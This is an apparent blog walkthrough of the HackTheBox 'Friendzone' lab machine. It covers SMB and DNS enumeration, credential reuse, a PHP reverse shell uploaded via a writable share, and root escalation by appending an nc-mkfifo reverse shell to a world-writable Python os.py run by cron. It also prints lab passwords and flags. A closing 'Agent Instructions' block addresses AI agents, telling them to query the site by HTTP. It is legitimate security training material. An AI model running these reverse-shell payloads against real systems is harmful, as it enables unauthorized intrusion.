# Friendzone Tags: #Linux #Enumeration #LFI #SMB #DNS #CronAbuse #PathHijacking Friendzone is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/173), created by Creator askar. In the current post, my IP is 10.10.14.24, and the target IP is 10.129.191.183. Friendzone is like those easy boxes that are challenging. At the start, it has a lot of noise and rabbit holes, wasting your time. The good thing about this machine, is it's a mix of many techniques and stuff, checking SMB, doing an LFI, inject a php file, etc. It's a funny machine. ### Gathering Information The first steps are about getting basic information about the target, by using nmap and searching information from the website. {% code title="Local Terminal" %} ```bash $ ping -c 1 10.129.191.183 Pinging 10.129.191.183 with 32 bytes of data: Reply from 10.129.191.183: bytes=32 time=176ms TTL=63 Reply from 10.129.191.183: bytes=32 time=188ms TTL=63 Reply from 10.129.191.183: bytes=32 time=233ms TTL=63 Reply from 10.129.191.183: bytes=32 time=168ms TTL=63 Ping statistics for 10.129.191.183: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 168ms, Maximum = 233ms, Average = 191ms ``` {% endcode %} By the TTL, we can assume that is a Linux Machine. {% code title="Local Terminal" %} ```bash $nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.191.183 --oG Ports Nmap scan report for 10.129.191.183 Host is up, received echo-reply ttl 63 (0.79s latency). Scanned at 2023-05-24 09:42:09 Pacific SA Standard Time for 25s Not shown: 39993 closed tcp ports (reset), 25535 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 21/tcp open ftp syn-ack ttl 63 22/tcp open ssh syn-ack ttl 63 53/tcp open domain syn-ack ttl 63 80/tcp open http syn-ack ttl 63 139/tcp open netbios-ssn syn-ack ttl 63 443/tcp open https syn-ack ttl 63 445/tcp open microsoft-ds syn-ack ttl 63 Read data files from: C:\Program Files (x86)\Nmap Nmap done: 1 IP address (1 host up) scanned in 25.41 seconds Raw packets sent: 106042 (4.666MB) | Rcvd: 42746 (1.710MB) ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ nmap -sC -sV -p 21,22,53,80,139,443,445 10.129.191.183 -oN Target Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-24 09:44 Pacific SA Standard Time Nmap scan report for 10.129.191.183 Host is up (0.18s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA) | 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA) |_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519) 53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Friend Zone Escape software |_http-server-header: Apache/2.4.29 (Ubuntu) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 443/tcp open ssl/http Apache httpd 2.4.29 |_http-title: 404 Not Found | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO | Not valid before: 2018-10-05T21:02:30 |_Not valid after: 2018-11-04T21:02:30 | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.29 (Ubuntu) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: , NetBIOS MAC: (unknown) | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2023-05-24T13:44:19 |_ start_date: N/A | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: friendzone | NetBIOS computer name: FRIENDZONE\x00 | Domain name: \x00 | FQDN: friendzone |_ System time: 2023-05-24T16:44:20+03:00 |_clock-skew: mean: -59m58s, deviation: 1h43m54s, median: 0s ``` {% endcode %} It has the FTP port 21 service working, we are going to check if has the user anonymous {% code title="Local Terminal" %} ```bash $ ftp 10.129.191.183 Connected to 10.129.191.183. 220 (vsFTPd 3.0.3) Name (10.129.191.183:root): anonymous 331 Please specify the password. Password: 530 Login incorrect. ftp: Login failed ``` {% endcode %} It doesn't work, and the services https at the port 443, can provide information by using the command openSSL {% code title="Local Terminal" %} ```bash $ openssl s_client -connect 10.129.191.183:443 CONNECTED(00000003) Cant use SSL_get_servername depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red verify error:num=18:self-signed certificate verify return:1 depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red verify error:num=10:certificate has expired notAfter=Nov 4 21:02:30 2018 GMT verify return:1 depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red notAfter=Nov 4 21:02:30 2018 GMT verify return:1 --- Certificate chain 0 s:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red i:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256 v:NotBefore: Oct 5 21:02:30 2018 GMT; NotAfter: Nov 4 21:02:30 2018 GMT --- Server certificate -----BEGIN CERTIFICATE----- <...> # Innecesary information -----END CERTIFICATE----- subject=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red issuer=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red --- No client certificate CA names sent Peer signing digest: SHA256 Peer signature type: RSA Server Temp Key: X25519, 253 bits --- SSL handshake has read 1677 bytes and written 386 bytes Verification error: certificate has expired --- New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384 Server public key is 2048 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE No ALPN negotiated SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-RSA-AES256-GCM-SHA384 Session-ID: 9463F6CBBB0671B5500A84FB494E988FAB498146CC26C50C15A05DC344B6847D Session-ID-ctx: Master-Key: 673175AB9328562B2F24180E4CEE79BBDF47F65472CA8EB708499ACB0A26903A38524E095BFBD51339B4056350435CE3 PSK identity: None PSK identity hint: None SRP username: None TLS session ticket lifetime hint: 300 (seconds) TLS session ticket: <...> #Innecesary info Start Time: 1684937022 Timeout : 7200 (sec) Verify return code: 10 (certificate has expired) Extended master secret: yes --- ``` {% endcode %} There is an email () and a domain (CN = friendzone.red), to avoid public IPs, we need to add it to /etc/hosts {% code title="Local Terminal" %} ```bash echo "10.129.191.183 friendzone.red" >> /etc/hosts ``` {% endcode %} {% code title="Local Terminal" %} ```bash echo "10.129.191.183 friendzone.red" >> /mnt/c/Windows/System32/drivers/etc/hosts ``` {% endcode %} Now, we are going to get information using whatweb to view the Content Manager {% code title="Local Terminal" %} ```bash $ whatweb http://friendzone.red/ http://friendzone.red/ [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], Email[info@friendzoneportal.red], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.129.191.183], Title[Friend Zone Escape software] ``` {% endcode %} New email added {} and thanks to it, another domain {friendzoneportal.red}, remember to add it in /etc/hosts. If you are using Windows, use vi C:\Windows\System32\drivers\etc\hosts * Browser:

At first sight, there is nothing, let's check with CTLR+U

* Browser:

It looks like a dead end, but still, we have two domains to test,

* Browser:
There is a hint in this image, let's go to
It changes always, uses base64, but if you decode that you will get nothing.
So, we got nothing, let's check the nmap information again and test with other channels. {% code title="Local Terminal" %} ```bash $ smbclient -L 10.129.191.183 -N Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers Files Disk FriendZone Samba Server Files /etc/Files general Disk FriendZone Samba Server Files Development Disk FriendZone Samba Server Files IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ smbmap -H 10.129.191.183 [+] Guest session IP: 10.129.191.183:445 Name: friendzone.red Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers Files NO ACCESS FriendZone Samba Server Files /etc/Files general READ ONLY FriendZone Samba Server Files Development READ, WRITE FriendZone Samba Server Files IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu)) ``` {% endcode %} The important information comes from the disk with permissions. {% code title="Local Terminal" %} ```bash $ smbclient //10.129.191.183/general -N Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jan 16 17:10:51 2019 .. D 0 Tue Sep 13 11:56:24 2022 creds.txt N 57 Tue Oct 9 20:52:42 2018 3545824 blocks of size 1024. 1651340 blocks available smb: \> get creds.txt getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) ``` {% endcode %} Go where you downloaded the creds.txt files and read the document {% code title="Local Terminal" %} ```bash $ cat creds.txt creds for the admin THING: admin:WORKWORKHhallelujah@# ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ smbmap -H 10.129.191.183 -u 'admin' -p 'WORKWORKHhallelujah@#' [+] Guest session IP: 10.129.191.183:445 Name: friendzone.red Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers Files NO ACCESS FriendZone Samba Server Files /etc/Files general READ ONLY FriendZone Samba Server Files Development READ, WRITE FriendZone Samba Server Files IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu)) ``` {% endcode %} Valid, but nothing change Now, we are going to abuse to the service at the port 53, to make a Zone Transference Attack. {% code title="Local Terminal" %} ```bash $ dig +short ns friendzone.red ns2.hostresolver.com. ns1.hostresolver.com. ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ dig axfr friendzone.red @ns1.hostresolver.com. # Some writeups says that this should work, but for some reason I want use axfr scan. # You should find: https://administrator1.friendzone.red/ ``` {% endcode %} {% code title="Local Terminal" %} ```bash echo "10.129.191.183 administrator1.friendzone.red" >> /etc/hosts echo "10.129.191.183 administrator1.friendzone.red" >> /mnt/c/Windows/System32/drivers/etc/hosts ``` {% endcode %} * Browser:
Login with the credentials admin:WORKWORKHhallelujah@#
* Browser:
* Browser:
We can see that the website respond to the parameter timestamp, by adding a .php at the end. Thanks to SMB we find a folder called Development that we can read and write, this sounds weird but there is a chance that by creating a file and test something will happen. {% code title="Local Terminal" %} ```bash $ vi test.php ``` {% endcode %} {% code title="test.php" %} ```php ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ smbclient //10.129.191.183/Development -N $ put test.php $ exit ``` {% endcode %} * Browser:

It works!

Ok, with this information at our hand, we know that we can create a reverse shell {% code title="Local Terminal" %} ```bash $ vi reverse.php ``` {% endcode %} {% code title="reverse.php" %} ```php & /dev/tcp/10.10.14.24/443 0>&1'"); ?> ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ smbclient //10.129.191.183/Development -N $ put reverse.php $ exit ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ rlwrap nc -nlvp 443 ``` {% endcode %} Now to work better, you need to do a [Bash Upgrade](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md). {% code title="Local Terminal" %} ```bash www-data@FriendZone:/var/www/admin$ ls dashboard.php images index.html login.php timestamp.php www-data@FriendZone:/var/www/admin$ cd .. www-data@FriendZone:/var/www$ ls admin friendzone friendzoneportal friendzoneportaladmin html mysql_data.conf uploads ``` {% endcode %} Always, configuration files like "mysql\_data.conf" are worth to check {% code title="Target Terminal \[www-data]" %} ```bash www-data@FriendZone:/var/www$ cat mysql_data.conf for development process this is the mysql creds for user friend db_user=friend db_pass=Agpyu12!0.213$ db_name=FZ ``` {% endcode %} Credentials in plain text! {% code title="Target Terminal \[www-data]" %} ```bash www-data@FriendZone:/var/www$ su friend Password: #Try: Agpyu12!0.213$ ``` {% endcode %} And it works. \[Friend] {% code title="Target Terminal \[Friend]" %} ```bash cat /home/friend/user.txt 2600be66938148dc65125e3e58a9fbb4 ``` {% endcode %} ### Privileges Escalation While looking around the target, I found an interesting file in /opt/server\_admin/ {% code title="Local Terminal" %} ```bash # Download pspy64 from https://github.com/DominicBreuker/pspy python3 -m http.server 80 ``` {% endcode %} {% code title="Target Terminal \[Friend]" %} ```bash $ cd /tmp $ wget http://10.10.14.24/pspy64 $ chmod 777 pspy64 $ ./pspy64 <...> 2023/05/25 00:09:04 CMD: UID=0 PID=3259 | /bin/sh -e /usr/lib/php/sessionclean 2023/05/25 00:09:04 CMD: UID=0 PID=3260 | /bin/sh -e /usr/lib/php/sessionclean 2023/05/25 00:09:04 CMD: UID=0 PID=3261 | /bin/sh -e /usr/lib/php/sessionclean 2023/05/25 00:09:04 CMD: UID=0 PID=3262 | /bin/sh -e /usr/lib/php/sessionclean 2023/05/25 00:09:04 CMD: UID=0 PID=3265 | 2023/05/25 00:10:01 CMD: UID=0 PID=3268 | /bin/sh -c /opt/server_admin/reporter.py 2023/05/25 00:10:01 CMD: UID=0 PID=3267 | /bin/sh -c /opt/server_admin/reporter.py 2023/05/25 00:10:01 CMD: UID=0 PID=3266 | /usr/sbin/CRON -f <...> ``` {% endcode %} {% code title="Target Terminal \[Friend]" %} ```bash cat reporter.py ``` {% endcode %} {% code title="reporter.py" %} ```python #!/usr/bin/python import os to_address = "admin1@friendzone.com" from_address = "admin2@friendzone.com" print "[+] Trying to send email to %s"%to_address #command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"''' #os.system(command) # I need to edit the script later # Sam ~ python developer ``` {% endcode %} {% code title="Target Terminal \[Friend]" %} ```bash friend@FriendZone:/opt/server_admin$ ls -la /usr/lib/python2.7/os.py -rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py # Or you can try "find -type f -writable -ls" (From "0xdf hacks stuff") ``` {% endcode %} As you can see, the package "os" is executed from python and by root and we have write permission. {% code title="Local Terminal" %} ```bash $ nc -nlvp 444 ``` {% endcode %} {% code title="Target Terminal \[Friend]" %} ```bash echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 10.10.14.24 444 >/tmp/f')" >> /usr/lib/python2.7/os.py ``` {% endcode %} And now wait until the task reporter.py runs again. {% code title="Target Terminal \[Root]" %} ```bash $ cat /root/root.txt b344a6bb6a825d4352df233dd8ffd6fc ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/easy-machine/friendzone.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.